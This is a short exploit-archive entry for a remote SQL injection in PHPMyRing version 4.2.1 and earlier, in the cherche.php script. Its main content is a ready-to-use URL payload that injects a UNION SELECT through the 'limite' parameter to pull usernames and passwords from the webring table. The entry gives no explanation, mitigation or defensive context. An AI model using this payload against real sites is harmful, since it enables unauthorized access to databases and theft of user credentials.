id: 1087
date: 10/28/2006
title: PHPMyRing <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability
author: ajann
cves: 

===================================================================
PHPMyRing <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability
===================================================================


*******************************************************************************
# Title  :  PHP My Ring <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability
# Author :   ajann
*******************************************************************************

###http://[target]/[path]/cherche.php?limite=-1%20union%20select%200,pseudo,0,mdp,0,0%20from%20webring/*&mots=%20&where=description

# ajann,Turkey
# ...

# Im not Hacker!


#  0day.today [2023-03-25]  #